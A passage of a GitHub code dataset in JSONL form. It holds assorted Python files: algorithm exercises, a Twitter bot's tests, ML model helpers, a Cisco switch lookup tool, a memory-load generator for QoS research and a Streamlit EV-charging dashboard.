print(self.bought_cars[i]['car'])\n\n\nif __name__ == '__main__':\n carpark = CarMarket.carpark\n seller_1 = Seller('aram', 'shahbazyan', 'yerevan', carpark)\n car_1 = Car('BMW', 5000, 1000)\n buyer_1 = Buyer('meliq', 'harutyunyan', 'yerevan')\n\n buyer_1.buy(car_1, seller_1)\n buyer_1.print_my_cars()\n print(buyer_1.bought_cars)\n # add_new_car = CarMarket()\n # add_new_car.add_car(car_1, seller_1)\n print(carpark)\n","repo_name":"AramShahbazyan/Car_Market","sub_path":"buyer.py","file_name":"buyer.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"hy","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25560028275","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def verticalOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n results = collections.defaultdict(list)\n import queue\n queue = queue.Queue()\n queue.put((root, 0))\n while not queue.empty():\n node, x = queue.get()\n if node:\n results[x].append(node.val)\n queue.put((node.left, x - 1))\n queue.put((node.right, x + 1))\n \n return [results[i] for i in sorted(results)]\n\n","repo_name":"jxlxt/leetcode","sub_path":"Python/314.binay_tree_vertical_order_traversal.py","file_name":"314.binay_tree_vertical_order_traversal.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2790604064","text":"ornek= \"bu gun hava cok guzel\"\n\n#print(ornek.capitalize())\n#print(ornek.upper())\n#print(\"bu gun hava durumu:\"+ ornek)\n#print(\"bu gun hava durumu:{}\".format(ornek))\n#print(\"bu gun hava durum u:\", ozel_sayim, ornek)\n#print(ozel_sayim == None)\n\n\n#meyveler[\"elma\", \"armut\", \"ananas\"]\n\n#print(meyveler.append(\"kiraz\"))\n#print(meyveler)\n#meyveler.insert(1,\"avokado\")\n#ozeşl_sayilar=[10,2,5,21,16]\n#ozel_sayilar.sort()\n\n\n#varsayilan_not = {\"vise\": 0, \"final\": 0}\n#ogrenciler= {\n\n # 'Sezer Bozkir' : {'vise': 80, \"final\": 90}, #tek veya çift tırnak olması durumu değiştirmez ama ikisi aynı olsa iyii olur\n # 'Fatmanur Bilke ':{'vise':60, \"final\": 100}\n#}\n\n#print(ogrenciler.get('Enes Sahin'))\n #if 
ogrenciler.get('Enes Sahin') == None :\n # ogrenciler.update({'Enes Sahin': varsayilan_not,\n # 'Mustafa Ersoy':varsayilan_not})\n\n #print(ogrenciler.get(\"Yasar Celep\", varsayilan_not))\n\n #print(ogrenciler)\n #print(ogrenciler.items())\n #for ogrenci, notu in ogrenciler.items():\n# ogrenciler[ogrenci]['vise'] = 0\n\n # print(ogrenciler)\n\n #print(ogrenciler)\n\nvize_final_notları = {}\nfor İ in range(5):\n\n ogrenci_ismi = input('ogrenci İsmi : ')\n\nvize_notu= int(input('Vize Notu'))\nfinal_notu = int(input('Final Notu'))\n\n\n\n\n #tekrarrr!!!!\n\n#for(int i=0; i<5; i++)\n\n # for i in range(0.6.1)\n\n # for i in [0,1,2,3,4,5]:\n\n\n\n\n\n\n\n\n\n","repo_name":"agrk/eyl-l","sub_path":"ikinci gün.py","file_name":"ikinci gün.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11900670951","text":"from pandas import *\nimport os\n\ndf = read_csv('/scratch/rx32940/PATRIC_biosample_assemblies.csv',header = None) # read from csv, assembly as index\n\n#df = df.parse(xls.sheet_names[0], index_col = 1) # parse the first sheet of excel with row name = 1\n\ndf.iloc[:,1] = df.iloc[:,1].str[:13] # substring the version from the assembly accession\ndf.iloc[:,1] = [item.replace(\"GCF\",\"GCA\") for item in df.iloc[:,1]] # replace all refseq accession with genebank acc\nprint(df)\nbiosample_assembly = df.set_index(1)[0].to_dict() # set assembly as index, biosample as point to\n#print(biosample_assembly)\n\n\npath = \"/scratch/rx32940/PATRIC_assemblies_633/ncbi-genomes-2020-01-22/\"\n\nfor f in os.listdir(path):\n assembly = f[0:f.index(\".\")]\n biosample_name = biosample_assembly[assembly]\n os.rename(path+f,path+biosample_name + \".fna.gz\")\n #print(biosample_name)\n\n\n\n","repo_name":"rx32940/Lepto-Phylogeography","sub_path":"Assemblies_code/query_biosample_assembly.py","file_name":"query_biosample_assembly.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9732130141","text":"from mock import create_autospec\n\nfrom tweet.bills import Bill\nfrom tweet.conftest import EXAMPLE_INTRODUCTIONS\nfrom tweet.twitter import TwitterClient, TwitterBot, TwitterCredentials, TWITTER_MAX_CHARS, SHORT_URL_LENGTH, \\\n TWEET_TEMPLATE, REPLY_TEMPLATE\n\nEXAMPLE_INTRODUCTION = EXAMPLE_INTRODUCTIONS[0]\nTWEET = 'Make it illegal to put ketchup on hotdogs ' \\\n 'O2099-1111 http://chicago.legistar.com/gateway.aspx?M=F2&ID=O2099-1111'\n\n\ndef test_tweet_introductions():\n twitter_client = create_autospec(TwitterClient)\n twitter_bot = TwitterBot(twitter_client)\n\n twitter_bot.tweet_bill(EXAMPLE_INTRODUCTION)\n\n assert twitter_client.update_status.call_count == 1\n twitter_bot.twitter_client.update_status.assert_any_call(status=TWEET, in_reply_to_status_id=None)\n\n\ndef tweet_after_url_shortening(bill, reply_to=None):\n tweet_with_shortened_url = TWEET_TEMPLATE.format(\n title=bill.title,\n identifier=bill.identifier,\n url=SHORT_URL_LENGTH * 'x'\n )\n if reply_to is not None:\n tweet_with_shortened_url = REPLY_TEMPLATE.format(username=reply_to, tweet=tweet_with_shortened_url)\n return tweet_with_shortened_url\n\n\ndef test_shorten_shortening_required():\n bot = TwitterBot(TwitterCredentials('', '', '', ''))\n bill_identifier = 'O2099-1111'\n tweet_with_shortened_url = tweet_after_url_shortening(Bill(bill_identifier, '', [], ''))\n allowed_chars_excluding_url = (TWITTER_MAX_CHARS - 
len(tweet_with_shortened_url))\n too_long_title = 'x' * (allowed_chars_excluding_url + 1)\n bill = Bill(bill_identifier, too_long_title, '', '')\n too_many_chars_tweet = tweet_after_url_shortening(bill)\n\n shortened_bill = bot.shorten(bill)\n\n assert len(too_many_chars_tweet) == TWITTER_MAX_CHARS + 1\n assert len(tweet_after_url_shortening(shortened_bill)) == TWITTER_MAX_CHARS\n\n\ndef test_shorten_shortening_not_required():\n bot = TwitterBot(TwitterCredentials('', '', '', ''))\n bill_identifier = 'O2099-1111'\n bill_title = 'title'\n bill = Bill(bill_identifier, bill_title, '', '')\n shortened_bill = bot.shorten(bill)\n\n assert len(tweet_after_url_shortening(bill)) <= TWITTER_MAX_CHARS\n assert shortened_bill == bill\n\n\ndef test_shorten_with_reply():\n # seems like @username should not count against 280 chars, based on twitter api docs\n # however when trying to update status starting with @username it was being counted\n # against total.\n bot = TwitterBot(TwitterCredentials('', '', '', ''))\n user_name = 'username'\n bill = Bill(\n 'O2018-6573',\n 'Restructuring of debt to approve settlement payment from original owner NHS Redevelopment Corp., '\n 'and allow multiple property transfers, restructuring of City loans, affordability restrictions and '\n 'project rehabilitation agreements with new owner, Villa Capital Partners LLC and Villa Capital '\n 'Managers LLC',\n ['ordinance'],\n 'ocd-bill/c08ea55e-4017-4dfa-bfca-604b0eba0e85',\n '2018-07-25', -1\n )\n shortened_bill = bot.shorten(bill, user_name)\n\n assert len(tweet_after_url_shortening(shortened_bill, user_name)) == TWITTER_MAX_CHARS\n assert tweet_after_url_shortening(shortened_bill, user_name) == \\\n '@username Restructuring of debt to approve settlement payment from original owner NHS Redevelopment ' \\\n 'Corp., and allow multiple property transfers, restructuring of City loans, affordability restrictions and ' \\\n 'project rehabilitation agreements wi... 
O2018-6573 xxxxxxxxxxxxxxxxxxxxxxx'\n","repo_name":"mkrump/chicagoledger","sub_path":"tweet/tests/test_twitter.py","file_name":"test_twitter.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"74876264738","text":"import os\nfrom dotenv import load_dotenv\n\nfrom prometheus.manager import Manager\nfrom arguments.args import Args\nimport auth.dex\n\n\nargs = Args()\n\nload_dotenv(args.getEnvFileName())\n\nhostapi = os.environ.get(\"HOSTAPI\")\nrange = os.environ.get(\"RANGE\", \"1w\")\n\nsession = auth.dex.getSession()\n\ninfoMessage = (\n f\"{args.getInfo()}\\nMetrics is collected from '{hostapi}' on range '{range}'\"\n)\nprint(infoMessage)\n\nmanager = Manager(session, hostapi, range)\nmanager.collectData()\n\nif args.args.debug:\n manager.printResults()\n\nprint(\"Summary:\")\nmanager.printBalance()\nmanager.outputHtlm(infoMessage)\n","repo_name":"City-of-Helsinki/kube-resource-checker","sub_path":"kube_resource_checker.py","file_name":"kube_resource_checker.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18516257980","text":"import pickle\nimport torch\nfrom torch import nn\n\nfrom funcs_data_preprocessing import *\nfrom info_model import *\nfrom nets.LSTM import *\nfrom nets.LSTM_embed import *\n\n\ndef get_device():\n is_cuda = torch.cuda.is_available()\n if is_cuda:\n device = torch.device('cuda')\n print('GPU is available', flush=True)\n else:\n device = torch.device('cpu')\n print('GPU not available, CPU used', flush=True)\n return device\n\n\ndef get_dataInfo(modelName):\n dataInfo = dict()\n dataInfo['input_type'] = input_type[modelName]\n dataInfo['output_type'] = output_type[modelName]\n if 'iWorkerOnehot' in dataInfo['input_type']:\n _, workerIds = import_data(getWorkerIds=True)\n dataInfo['input_size'] = 28 + (len(workerIds) if 'iWorkerOnehot' in dataInfo['input_type'] else 0)\n dataInfo['output_size'] = 64\n dataInfo['num_output'] = 1\n return dataInfo\n\n\ndef get_model_filename(modelName, hyper_parameters, epoch=None):\n model_filename = modelName + '_' + '_'.join([k + str(v) for (k,v) in hyper_parameters.items()])\n if epoch is not None:\n model_filename = model_filename + '_epoch' + str(epoch) + '.p'\n return model_filename\n\n\ndef initialize_model(modelName, dataInfo, hyper_parameters):\n # Hyper-parameters\n hidden_size, n_epochs, lr_init, lr_adjust_type, batch_size = hyper_parameters['hidden_size'], hyper_parameters['n_epochs'], hyper_parameters['lr_init'], hyper_parameters['lr_adjust_type'], hyper_parameters['batch_size']\n # for embedding models\n if 'embed' in modelName:\n embed_size = hyper_parameters['embed_size']\n input_index = dict()\n input_index['gameStart'] = torch.arange(0,1)\n input_index['gameType'] = torch.arange(1,5)\n input_index['stimulus'] = torch.arange(5,26)\n input_index['reward'] = torch.arange(26,28)\n if 'iWorkerOnehot' in dataInfo['input_type']:\n _, workerIds = import_data(getWorkerIds=True)\n input_index['subjID'] = torch.arange(28,28+len(workerIds))\n \n # Instantiate the model with hyperparameters\n device = get_device()\n if modelName == 'LSTM':\n model = LSTMModel(input_size=dataInfo['input_size'], output_size=dataInfo['output_size'], hidden_size=hidden_size, num_layers=1, device=device)\n elif modelName == 'LSTM_embed':\n model = LSTM_embed_Model(input_type=dataInfo['input_type'], input_size=dataInfo['input_size'], 
input_index=input_index, embed_size=embed_size, output_size=dataInfo['output_size'], hidden_size=hidden_size, num_layers=1, device=device)\n \n return model","repo_name":"mingyus/RNN-cogsci2021","sub_path":"funcs_model.py","file_name":"funcs_model.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"71492914659","text":"class RollingHash(object):\n\n\tdef __init__(self):\n\n\t\tself.base = 256\n\t\tself.p = self.calculate_p()\n\t\tself.hash = 0\n\t\tself.letters = []\n\n\t\t# this is base^windowsize mod p, however needs recomputing op since window size changes\n\t\tself.magic = 1\n\n\t\t# multiplicative inverse of base mod p\n\t\tself.ibase = pow(self.base,self.p-2,self.p) % self.p\n\n\tdef calculate_p(self):\n\t\treturn self.getPrime(self.base**3)\n\n\tdef isPrime(self, X):\n\t\tfor i in range(2, int(X**0.5) + 1, 1):\n\t\t\tif X % i == 0:\n\t\t\t\t# Factor found\n\t\t\t\treturn False\n\t\treturn True\n\n\tdef getPrime(self, n):\n\t\t\tcurrent = n+1\n\t\t\twhile True:\n\t\t\t\tif self.isPrime(current):\n\t\t\t\t\treturn current\n\t\t\t\tcurrent += 1\n\n\tdef append(self, c):\n\t\tself.letters.append(c)\n\t\tself.hash = ((self.hash * self.base) + ord(c)) % self.p\n\t\tself.magic = (self.magic * self.base) % self.p\n\n\tdef skip(self, c):\n\t\tdel self.letters[0]\n\t\tself.magic = (self.magic * (self.ibase % self.p)) % self.p\n\t\tself.hash = (self.hash - (ord(c) * self.magic) + (self.p * self.base)) % self.p\n\n\tdef get_hash(self):\n\t\treturn self.hash\n\n\tdef get_window(self):\n\t\treturn self.letters\n\n\nif __name__ == '__main__':\n\n\tdef log_output(rh, op):\n\t\tprint('Operation: ' + op, 'Hash: ' + str(rh.hash), 'Ibase: ' + str(rh.ibase), 'Magic: ' + str(rh.magic), rh.get_window())\n\n\ts = 'elf'\n\tt = 'the awesome story that was unexplainable was that of the elf and the cart. the elf was very elf-like.'\n\n\tprint('')\n\tprint('pattern: ', s)\n\tprint('searchstring: ', t)\n\tprint('')\n\n\trs = RollingHash()\n\trt = RollingHash()\n\n\tfor i in range(len(s)):\n\t\trs.append(s[i])\n\t\trt.append(t[i])\n\n\tprint('prime:', rt.p)\n\tprint('')\n\n\tmatch_indexes = []\n\tfor i in range(len(s),len(t)):\n\t\trt.append(t[i])\n\t\trt.skip(t[i-len(s)])\n\t\tif rs.get_hash() == rt.get_hash():\n\t\t\tif rs.get_window() == rt.get_window():\n\t\t\t\tmatch_indexes.append((i-len(s)+1,i+1))\n\n\tprint(\n\t\tstr(len(match_indexes)) + ' match found' if len(match_indexes)==1\n\t else str(len(match_indexes)) + ' matches found' +\n\t\t (': '+str(match_indexes) if match_indexes else ''))\n\tfor m in match_indexes:\n\t\tprint(t[m[0]:m[1]])\n\n","repo_name":"letsnotgothere/introductionToAlgorithms","sub_path":"DataStructures/RollingHash.py","file_name":"RollingHash.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29137997357","text":"from xpotato.dataset.utils import default_pn_to_graph\n\nfrom tuw_nlp.graph.utils import GraphFormulaPatternMatcher\n\n\nPATTERNS = [\n # He is the brother of the composer... -> is_the_brother_of(He, composer)\n (\n \"(u_0 / .* :nsubj (u_1 / .*) :nmod (u_2 / .* :case (u_3 / of)))\",\n (0, 3),\n ((1,), (2,)),\n ),\n # The Greater Tokyo Area is the most populous metropolitan area... -> is(Area, area)\n (\n \"(u_0 / .* :nsubj (u_1 / .*) :cop (u_2 / .*))\",\n (2,),\n ((1,), (0,)),\n ),\n # The Greater Tokyo Area is the ... area in the world... 
-> is(A, a, in the world)\n (\n \"(u_0 / .* :nsubj (u_1 / .*) :cop (u_2 / .*) :nmod (u_3 / .* :case (u_4 / .*)))\",\n (2,),\n ((1,), (0,), (3, 4)),\n )\n]\n\n\ndef get_mapping(graph):\n return {node[\"mapping\"]: node for _, node in graph.nodes(data=True)}\n\n\ndef get_pred(head_ids, graph, all_heads):\n all_nodes = []\n for head_id in head_ids:\n nodes = [head_id]\n for i, j, data in graph.G.out_edges(head_id, data=True):\n if j in all_heads:\n continue\n # print(json.dumps(graph.to_json(), indent=4))\n if data[\"color\"] in (\"AMOD\", \"COP\", \"DET\"):\n nodes.append(j)\n all_nodes += nodes\n\n return graph.subgraph(all_nodes)\n\n\ndef get_chunk_nodes(head_id, graph, all_heads):\n nodes = [head_id]\n for i, j, data in graph.G.out_edges(head_id, data=True):\n if j in all_heads:\n continue\n # print(json.dumps(graph.to_json(), indent=4))\n if data[\"color\"] in (\"NMOD\", \"AMOD\", \"ADVMOD\", \"DET\", \"COMPOUND\", \"APPOS\", \"FLAT\", \"CASE\"):\n nodes += get_chunk_nodes(j, graph, all_heads)\n return nodes\n\n\ndef get_chunk(mapped_head_ids, graph, all_heads):\n all_nodes = []\n for mapped_head_id in mapped_head_ids:\n # print('toks:', graph.tokens, 'nodes:', graph.G.nodes(data=True), 'mapped head id:', mapped_head_id)\n nodes = get_chunk_nodes(mapped_head_id, graph, all_heads)\n all_nodes += nodes\n return graph.subgraph(all_nodes)\n\n\ndef graph_to_text(graph):\n return \" \".join(tok for tok in graph.tokens if tok is not None)\n\n\ndef ud_to_triplets(graph):\n for patt, pred_ids, args in PATTERNS:\n # print('=====================')\n # print('patt, pred_ids, args:', patt, pred_ids, args)\n # print('=====================')\n patterns = [([patt], [], True)]\n matcher = GraphFormulaPatternMatcher(\n patterns, default_pn_to_graph, case_sensitive=False\n )\n for key, patt, subgraphs in matcher.match(graph.G, return_subgraphs=True):\n for subgraph in subgraphs:\n # print('subgraph:', subgraph.nodes(data=True))\n remaining_graph = graph.copy()\n mapping = {\n data[\"mapping\"]: node for node, data in subgraph.nodes(data=True)\n }\n arg_graphs = []\n arg_heads_by_arg = []\n all_heads = set()\n for arg_ids in args:\n mapped_ids = [mapping[head_id] for head_id in arg_ids]\n arg_heads_by_arg.append(mapped_ids)\n all_heads |= set(mapped_ids)\n\n pred_heads = [mapping[pred_id] for pred_id in pred_ids]\n all_heads |= set(pred_heads)\n\n for head_ids in arg_heads_by_arg:\n # print('remaining graph:', remaining_graph.str_nodes(), 'next arg head(s):', head_ids)\n arg_graph = get_chunk(head_ids, remaining_graph, all_heads)\n # print('arg graph:', arg_graph.tokens, arg_graph.str_nodes())\n arg_graphs.append(arg_graph)\n remaining_graph.remove_graph(arg_graph)\n\n pred_graph = get_pred(pred_heads, graph, all_heads)\n # print('pred graph:', pred_graph.tokens, pred_graph.str_nodes())\n # remaining_graph.remove_graph(pred_graph)\n\n yield graph_to_text(pred_graph), [\n graph_to_text(arg_graph) for arg_graph in arg_graphs\n ]\n","repo_name":"recski/tuw-nlp","sub_path":"tuw_nlp/sem/oie/ud.py","file_name":"ud.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} +{"seq_id":"3167117978","text":"import os\nimport signal\nfrom time import sleep\nimport logging\nfrom elasticsearch import Elasticsearch\n\nimport pymongo\n\nlogging.basicConfig(level=logging.INFO)\nTARGET_LOAD = 80\nTOLERANCE = 5\n\nes = Elasticsearch([\n 'monitornode.eqos:9200'\n])\n\n\ndef waster():\n byeMemory = []\n while True:\n global shouldFill\n if 
shouldFill:\n byeMemory.append([0]*100000)\n\n\nif __name__ == '__main__':\n with open('hostname') as fh:\n host = fh.readline().strip()\n\n global shouldFill\n logging.info(host)\n shouldFill = True\n pids = []\n\n while True:\n\n last_perf = None\n while not last_perf:\n try:\n elasticQuery = {\n \"query\": {\n \"match\": {\n \"host\": host\n }\n }\n }\n\n query_result = es.search(index=\"performance\", filter_path=['hits.hits._source'],\n body=elasticQuery, size=1,\n sort=\"usage.time:desc\")\n\n last_perf = [x[\"_source\"] for x in query_result[\"hits\"][\"hits\"]]\n last_perf = last_perf[0] if len(last_perf) > 0 else None\n except Exception:\n logging.error(\"Status update failed\")\n\n memory = last_perf['usage']['memory']\n if memory >= 100:\n logging.info(memory)\n if memory < TARGET_LOAD - TOLERANCE:\n pid = os.fork()\n if pid == 0:\n waster()\n exit(1)\n pids.append(pid)\n logging.info('Scaled %d' % len(pids))\n\n elif memory > TARGET_LOAD + TOLERANCE:\n if not pids:\n logging.warning('Should remove a child, but none are available')\n else:\n victim = pids.pop()\n os.kill(victim, signal.SIGTERM)\n os.waitpid(victim, 0)\n logging.info('Descaled %d' % len(pids))\n else:\n logging.info(\"Memory is in ideal load\")\n sleep(5)\n","repo_name":"gcd-cloud-research/KAQoS","sub_path":"images/memorywaster/waster.py","file_name":"waster.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36943696698","text":"#!/usr/bin/env python\nimport pdb\nimport re\nfrom netmiko import ConnectHandler, NetMikoTimeoutException\n\nclass CiscoSwitchTool():\n\n\n def __init__(self,**kwargs):\n try:\n self.net_connect = ConnectHandler(**kwargs)\n self.ip = kwargs['ip']\n except:\n raise NetMikoTimeoutException\n ##############################################\n # search ARP table for mac based in IP address\n # return mac or None if not found\n ##############################################\n def mac_from_ip(self,ip_addr):\n cli_output = self.net_connect.send_command(\"sh arp | inc \" + ip_addr)\n if (cli_output == ''):\n print(\"IP Address not found \" + ip_addr)\n return None\n else:\n # interate through output\n # find the line that matches IP\n for x in cli_output.splitlines():\n entry = (x.split())\n # check for 'incomplete' mac address\n \n # check if IP matches, if true return MAC\n if entry[1] == ip_addr:\n # check for 'incomplete' mac address\n if entry[3] == 'Incomplete':\n return None\n else:\n return entry[3]\n\n #############################################\n # Search mac-address table for mac address\n # return port or None if not found\n #############################################\n def port_from_mac(self,mac_addr):\n cli_output = self.net_connect.send_command(\"sh mac add | inc \" + mac_addr)\n if (cli_output == \"\"):\n print(\"MAC Address not found\")\n return None\n else:\n for x in cli_output.splitlines():\n entry = x.split()\n print(entry)\n return entry[3]\n #############################################\n # gather information about a channel-group\n # return list of ports in group\n #############################################\n def ports_from_etherchannel(self,channel_group_num):\n port_list = []\n command = 'sh etherchannel {} detail'.format(channel_group_num)\n output = self.net_connect.send_command(command)\n for line in output.splitlines():\n m = re.search('^Port: (.*)', line)\n if m is not None:\n port_list.append(m.group(1))\n \n return port_list\n 
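# example usage (hypothetical credentials; the ConnectHandler kwargs passed to __init__\n # are standard netmiko parameters such as device_type/ip/username/password):\n # tool = CiscoSwitchTool(device_type='cisco_ios', ip='192.0.2.1', username='admin', password='secret')\n # print(tool.port_from_ip('192.0.2.42'))\n 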
#######################################################\n # find CDP neighbor on port\n # function returns tuple with name,ip of CDP neighbor\n #######################################################\n def find_cdp_neighbor(self,port):\n command = 'sh cdp neighbors {} detail'.format(port)\n output = self.net_connect.send_command(command)\n if output == \"\":\n return None\n else:\n name = ''\n ip_addr = ''\n for line in output.splitlines():\n m1 = re.search('^Device ID: (.*)', line)\n m2 = re.search('^ IP address: (.*)', line)\n if m1 is not None:\n name = m1.group(1)\n elif m2 is not None:\n ip_addr = m2.group(1)\n \n return ((name, ip_addr))\n \n ####################################\n # run functions to find port for IP\n # returns port or None if not found\n # IP must be in switch ARP table\n ####################################\n def port_from_ip(self,ip_addr):\n mac_addr = self.mac_from_ip(ip_addr)\n if mac_addr is None:\n return None\n port = self.port_from_mac(mac_addr)\n return (port)\n\n ####################################\n # return the hostname of device\n ####################################\n def get_switch_name(self):\n #command = 'show run | inc hostname'\n #output = self.net_connect.send_command(command)\n #pdb.set_trace()\n output = self.net_connect.find_prompt()\n #pdb.set_trace()\n return output.strip('#')\n\n","repo_name":"km0420j/NetTools","sub_path":"switch_tool/cisco_switch_tool.py","file_name":"cisco_switch_tool.py","file_ext":"py","file_size_in_byte":4065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9961546797","text":"def selection_sort(nums: list[int]):\n \"\"\"选择排序\"\"\"\n # 外循环:未排序区间为 [i, n-1]\n for i in range(len(nums) - 1):\n min_index = i\n # 内循环:找到未排序区间内的最小元素\n for j in range(i + 1, len(nums)):\n if nums[j] < nums[min_index]:\n min_index = j\n nums[i], nums[min_index] = nums[min_index], nums[i]\n\nif __name__ == '__main__':\n nums = [1, 7, 6, 3, 2]\n selection_sort(nums)\n print(nums)","repo_name":"FanMagnum/hello-algorithms","sub_path":"sort/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31886165962","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 13 22:25:33 2022\n\n@author: kyrie\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n#scatter chart plotly\nimport plotly.express as px\n\ncolor = sns.color_palette(\"viridis\")\n\n\ndf = pd.read_csv(r\"C:\\Users\\kyrie\\ironhack\\project5\\clean_data_project5.csv\")\n\n\ndfcolumns = df.columns\ndaycount = df['weekday'].value_counts()\ndf['managerVehicle']= df['managerVehicle'].replace(1,'Yes')\ndf['managerVehicle']= df['managerVehicle'].replace(0,'No')\n\nimport streamlit as st\nst.set_option('deprecation.showPyplotGlobalUse', False)\n\n\n\n### Title of the page\nst.markdown(\n\t\"
    Project 5
    \",\n\tunsafe_allow_html=True,\n)\n\nfrom PIL import Image\nimage = Image.open(r\"C:\\Users\\kyrie\\Downloads\\carr.jpg\")\n#center the image in the middle of the page\ncol1, col2, col3 = st.columns([0.2, 5, 0.2])\ncol2.image(image, use_column_width=True)\n\n###################################################################################\n## SECTION 1\nst.markdown(\"## Charger Type\")\n\n# filter the data for\nclist = df[\"facilityType\"].unique()\nst.sidebar.markdown(\"## charger Type: \")\nfacilityType = st.sidebar.selectbox(\"Select a facility Type: \", clist)\nfilter1 = df[df[\"facilityType\"] == facilityType]\n\n\n########## METRICS INDICATORS\nm1, m2, m3, m4 = st.columns((1, 1, 1, 1))\nmean_payments = round(filter1[\"dollars\"].mean(), 1)\nmean_kwh = round(filter1[\"kwhTotal\"].mean(), 1)\nmean_charging_times = round(filter1[\"chargeTimeHrs\"].mean(), 1)\nfacilityType_count = filter1[\"facilityType\"].count()\n\nm1.metric(label=\"facilty Type count\", value=facilityType_count)\nm2.metric(label=\"average payment\", value=str(float(mean_payments)) + \" $\")\nm3.metric(label=\"average kwh\", value=str(float(mean_kwh)) + \" Kwh\")\nm4.metric(label=\"Average charging time\", value=str(float(mean_charging_times)) + \" Hours\")\n\n\n## SECTION 2\nst.sidebar.markdown(\"Payment Platform\")\nst.markdown(\"## Payment Platform\")\n\n# filter the data for\nclist = df[\"platform\"].unique()\nplatform = st.sidebar.selectbox(\"Select a platform: \", clist)\nfilter2 = df[df[\"platform\"] == platform]\n\n\n########## METRICS INDICATORS\nmm1, mm2, mm3, mm4 = st.columns((1, 1, 1, 1))\nmean_payments = round(filter2[\"dollars\"].mean(), 1)\nmean_kwh = round(filter2[\"kwhTotal\"].mean(), 1)\nmean_charging_times = round(filter2[\"chargeTimeHrs\"].mean(), 1)\nplatform_count = filter2[\"platform\"].count()\n\nmm1.metric(label=\"platform\", value=platform_count)\nmm2.metric(label=\"average payment\", value=str(float(mean_payments)) + \" $\")\nmm3.metric(label=\"average kwh\", value=str(float(mean_kwh)) + \" Kwh\")\nmm4.metric(label=\"Average charging time\", value=str(float(mean_charging_times)) + \" Hours\")\n\n#####################################################################\n\nst.markdown(\"## day of Charging\")\n\ndfpie = pd.DataFrame({'day': ['Fri','Mon','Sat','Sun','Thu','tue','Wed'], 'count': [610, 615, 62, 24,735,635,713]},\n index = [1, 2, 3, 4, 5, 6, 7])\nfig18 = px.pie(dfpie, values='count', names='day', color_discrete_sequence=px.colors.sequential.Viridis)\nst.plotly_chart(fig18)\n#############\n\ndf['index_col'] = df.index\n\nchoix = st.sidebar.selectbox(\"Select one variable to heatmap\", ['price', 'kwh_Total','charging_Hour'])\n\nif choix == \"price\":\n st.title(\"heatmap of the price distribution\")\n fig5 = px.density_heatmap(\n data_frame=df, y=\"index_col\", x=\"dollars\"\n )\n st.plotly_chart(fig5)\n \nif choix == \"kwh_Total\":\n fig6 = px.density_heatmap(\n data_frame=df, y=\"index_col\", x=\"kwhTotal\"\n )\n st.plotly_chart(fig6)\n \nif choix == 'charging_Hour':\n st.title(\"heatmap of the price distribution\")\n fig7 = px.density_heatmap(\n data_frame=df, y=\"index_col\", x=\"startTime\"\n )\n st.plotly_chart(fig7)\n\n\n\n\n## SECTION 3\n\nst.markdown(\"## additional Bar chart of the charge time, the price and the electricity quantity\")\n\nchart_data = pd.DataFrame(\n df[['chargeTimeHrs','kwhTotal', 'dollars']].head(60),\n columns=[\"chargeTimeHrs\", \"kwhTotal\", \"dollars\"])\nst.bar_chart(chart_data)\n\n\n\n\n#df['weekday'].value_counts().index\n\n\n\n\n#create two 
columns with the two scatter plots\nfig_col1, fig_col2 = st.columns(2)\n\ndf['col3'] = np.arange(len(df))*0.05\n\nwith fig_col1:\n st.markdown(\n \t\"
    charge time depending on the charger type
    \",\n \tunsafe_allow_html=True,\n )\n fig3 = px.scatter(df, x='facilityType', y='chargeTimeHrs',size = 'col3') \n st.plotly_chart(fig3)\n\n\nwith fig_col2:\n st.markdown(\n \t\"
    price depending on the charge time
